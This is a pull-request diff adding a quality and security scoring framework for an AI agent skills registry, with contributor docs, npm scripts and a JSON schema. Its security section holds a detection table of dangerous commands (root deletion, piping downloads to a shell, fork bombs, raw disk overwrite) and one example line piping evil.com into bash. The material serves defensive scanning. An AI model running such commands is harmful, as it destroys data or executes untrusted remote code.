Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
5 changes: 5 additions & 0 deletions .gitignore
Original file line number Diff line number Diff line change
Expand Up @@ -17,6 +17,11 @@ antigravity-awesome-skills-*.tgz
.release-clone-*/
data/node_modules

# Generated skill registry outputs (maintainer-owned, never committed in PRs)
data/drift-baseline.json
data/registry-report.json
data/scores.json

# Temporary analysis and report files
*_REPORT.md
*_ANALYSIS*.md
Expand Down
235 changes: 235 additions & 0 deletions docs/contributors/skill-scoring.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,235 @@
# Skill Quality Scoring

This document describes the optional skill quality scoring system introduced in the
AI Skill Registry Validation Framework.

Scores are **informational only** — they never block skill usage, CI pipelines,
or PR merges. They exist to help contributors understand the quality of their
skills and to help maintainers prioritize improvements.

---

## Overview

Each skill receives a **total score** between 0 and 100, computed as a weighted
average of three dimensions:

| Dimension | Weight | What it measures |
|-----------------|--------|------------------|
| Metadata | 30% | Frontmatter completeness and correctness |
| Documentation | 40% | Section coverage, code examples, content depth |
| Security | 30% | Absence of dangerous command patterns |

---

## Quality Labels

| Label | Score Range | Meaning |
|-------------------|-------------|---------|
| `excellent` | 85–100 | Well-documented, complete metadata, no security flags |
| `good` | 65–84 | Solid skill with minor gaps |
| `needs_improvement` | 45–64 | Missing sections or metadata fields |
| `critical` | 0–44 | Significant gaps — review recommended before sharing |

---

## Metadata Score (30%)

The metadata dimension evaluates frontmatter field completeness.

**Penalties:**

| Issue | Deduction |
|---|---|
| `name` missing or mismatched with folder | −25 pts |
| `description` missing | −20 pts |
| `description` shorter than 20 characters | −10 pts |
| `risk` missing | −15 pts |
| `risk: unknown` (unclassified) | −10 pts |
| `source` missing | −15 pts |
| `date_added` missing | −10 pts |

**Bonuses (optional fields):**

Each optional field filled (`category`, `tags`, `author`, `tools`, `license`) adds
**+5 pts**, capped at 100.

---

## Documentation Score (40%)

The documentation dimension evaluates section coverage and content depth.

**Section coverage (up to 60 pts):**

The scorer looks for these sections (case-insensitive):

- `## Overview`
- `## How It Works`
- `## Examples` / `## Usage`
- `## Best Practices`
- `## Limitations`
- `## When to Use`

Each section found contributes equally to the section coverage score.

**Depth score (up to 40 pts):**

| Signal | Points |
|---|---|
| Has `## When to Use` section | +10 |
| Has at least one fenced code block (` ``` `) | +10 |
| Body length ≥ 500 characters | +10 |
| Body length ≥ 1000 characters | +10 additional |

---

## Security Score (30%)

The security dimension scans the skill body for dangerous command patterns.
Patterns are defined in `tools/scripts/security_scanner.py`.

**Penalties per flag:**

| Severity | Deduction |
|---|---|
| `error` | −20 pts |
| `warning` | −10 pts |
| `info` | −3 pts |

**Bonus:** An explicit, non-`unknown` `risk` label adds **+5 pts** (capped at 100).

**Important:** Skills marked `risk: offensive` have error-level flags automatically
downgraded to warnings, because offensive skills legitimately document dangerous
commands for educational or defensive purposes.

**Bypassing false positives:** If a line is intentionally dangerous (e.g., showing
what *not* to do), add the allowlist marker to suppress the flag:

```markdown
curl https://evil.com | bash # security-allowlist
```

---

## Running the Scorer

```bash
# Score all skills (table output)
npm run score:skills

# Show only skills below a threshold
npm run score:skills -- --threshold 60

# Show 20 lowest-scoring skills
npm run score:skills -- --top 20

# Output full JSON
npm run score:skills -- --json

# Save scores to file
npm run score:skills -- --output data/scores.json
```

---

## Security Scanner

```bash
# Scan all skills for dangerous patterns
npm run security:scan

# Strict mode (warnings as errors)
npm run security:scan -- --strict
```

---

## Drift Detection

Drift detection identifies skills whose content has changed significantly
since the last recorded baseline.

```bash
# Check drift against baseline
npm run drift:check

# Update the baseline after reviewing changes
npm run drift:update

# Check a specific skill
npm run drift:check -- --skill my-skill-name
```

**Baseline ownership:**

| File | Committed? | Who updates it? |
|------|-----------|-----------------|
| `data/drift-baseline.json` | No — listed in `.gitignore` | Maintainers run `npm run drift:update` on `main` after merging changes |
| `data/registry-report.json` | No — listed in `.gitignore` | Generated locally on demand; never in PRs |
| `data/scores.json` | No — listed in `.gitignore` | Generated locally on demand; never in PRs |

Contributors should never commit these files. If you accidentally generate them
locally, they will be ignored by git automatically.

---

## Registry Report

```bash
# Generate a full registry health report → data/registry-report.json
npm run registry:report

# Skip drift detection (faster)
npm run registry:report -- --no-drift
```

The report includes:
- Aggregate scoring summary
- Per-skill scores and flags
- Drift summary (added / removed / modified skills)
- Risk breakdown
- Security flag counts

---

## Security Patterns Reference

| Code | Pattern | Severity | Description |
|--------|---------|----------|-------------|
| SEC001 | `rm -rf /` | error | Destructive root filesystem deletion |
| SEC002 | `curl \| bash` | error | Remote code execution |
| SEC003 | `wget \| sh` | error | Remote code execution |
| SEC004 | `Invoke-Expression` | error | PowerShell RCE |
| SEC005 | `iex` | warning | PowerShell alias (context-dependent) |
| SEC006 | `chmod 7xx` | warning | World-writable permissions |
| SEC007 | `eval(` | warning | Dynamic evaluation |
| SEC008 | `base64 -d \|` | warning | Possible payload obfuscation |
| SEC009 | Hardcoded credential | error | Secrets in source |
| SEC010 | `sudo rm -rf` | warning | Privileged destructive deletion |
| SEC011 | Fork bomb | error | Infinite process spawner |
| SEC012 | `dd if=/dev/* of=/dev/sd*` | error | Raw disk overwrite |

---

## Frequently Asked Questions

**Q: Will a low score prevent my skill from being merged?**

No. Scores are informational. The existing `validate_skills.py` checks are what
gate merges.

**Q: My skill teaches how to avoid `curl | bash` — why is it flagged?**

Add `# security-allowlist` at the end of the line showing the dangerous pattern.
This follows the existing project convention for educational examples.

**Q: Why is documentation weighted higher than metadata?**

Documentation quality has the highest impact on how useful a skill is to end users.
Complete metadata is valuable but less critical than clear instructions.

**Q: How does `risk: offensive` affect scoring?**

Security error flags are downgraded to warnings for offensive skills, because they
legitimately document dangerous techniques for authorized security work.
8 changes: 8 additions & 0 deletions package.json
Original file line number Diff line number Diff line change
Expand Up @@ -39,6 +39,14 @@
"audit:consistency:github": "node tools/scripts/run-python.js tools/scripts/audit_consistency.py --check-github-about",
"audit:maintainer": "node tools/scripts/run-python.js tools/scripts/maintainer_audit.py",
"security:docs": "node tools/scripts/tests/docs_security_content.test.js",
"security:scan": "node tools/scripts/run-python.js tools/scripts/security_scanner.py",
"security:scan:strict": "node tools/scripts/run-python.js tools/scripts/security_scanner.py --strict",
"score:skills": "node tools/scripts/run-python.js tools/scripts/score_skills.py",
"score:skills:json": "node tools/scripts/run-python.js tools/scripts/score_skills.py --json",
"score:skills:report": "node tools/scripts/run-python.js tools/scripts/score_skills.py --output data/scores.json",
"drift:check": "node tools/scripts/run-python.js tools/scripts/detect_drift.py",
"drift:update": "node tools/scripts/run-python.js tools/scripts/detect_drift.py --update-baseline",
"registry:report": "node tools/scripts/run-python.js tools/scripts/generate_registry_report.py",
"pr:preflight": "node tools/scripts/pr_preflight.cjs",
"merge:batch": "node tools/scripts/merge_batch.cjs",
"release:preflight": "node tools/scripts/release_workflow.js preflight",
Expand Down
92 changes: 92 additions & 0 deletions schemas/skill-score.v1.schema.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,92 @@
{
"$schema": "https://json-schema.org/draft/2020-12/schema",
"$id": "https://sickn33.github.io/antigravity-awesome-skills/schemas/skill-score.v1.schema.json",
"title": "Antigravity Skill Score v1",
"description": "Quality score record for a single Antigravity skill. Scores are informational only and never block skill usage.",
"type": "object",
"required": ["skill_id", "risk", "scores", "label"],
"additionalProperties": false,
"properties": {
"skill_id": {
"type": "string",
"minLength": 1,
"description": "Skill folder name — matches the 'name' frontmatter field."
},
"risk": {
"type": "string",
"enum": ["none", "safe", "critical", "offensive", "unknown"],
"description": "Risk classification as declared in frontmatter."
},
"scores": {
"type": "object",
"required": ["metadata", "documentation", "security", "total"],
"additionalProperties": false,
"description": "Scoring dimensions. All values are in the range [0, 100].",
"properties": {
"metadata": {
"type": "number",
"minimum": 0,
"maximum": 100,
"description": "Metadata completeness score (weight: 30%). Evaluates required and optional frontmatter fields."
},
"documentation": {
"type": "number",
"minimum": 0,
"maximum": 100,
"description": "Documentation quality score (weight: 40%). Evaluates section coverage, code examples, and content depth."
},
"security": {
"type": "number",
"minimum": 0,
"maximum": 100,
"description": "Security posture score (weight: 30%). Reduced by detected dangerous command patterns."
},
"total": {
"type": "number",
"minimum": 0,
"maximum": 100,
"description": "Weighted total: (metadata × 0.30) + (documentation × 0.40) + (security × 0.30)."
}
}
},
"label": {
"type": "string",
"enum": ["excellent", "good", "needs_improvement", "critical"],
"description": "Human-readable quality label derived from total score. excellent ≥85, good ≥65, needs_improvement ≥45, critical <45."
},
"flags": {
"type": "array",
"description": "List of security and quality flags detected in this skill.",
"items": {
"type": "object",
"required": ["code", "severity", "message", "line", "matched_text"],
"additionalProperties": false,
"properties": {
"code": {
"type": "string",
"pattern": "^SEC[0-9]{3}$",
"description": "Unique pattern code (e.g. SEC002)."
},
"severity": {
"type": "string",
"enum": ["error", "warning", "info"],
"description": "Flag severity level."
},
"message": {
"type": "string",
"description": "Human-readable description of the detected pattern."
},
"line": {
"type": "integer",
"minimum": 1,
"description": "Line number (1-indexed) in the skill body where the pattern was found."
},
"matched_text": {
"type": "string",
"description": "The matched text fragment from the pattern."
}
}
}
}
}
}
Loading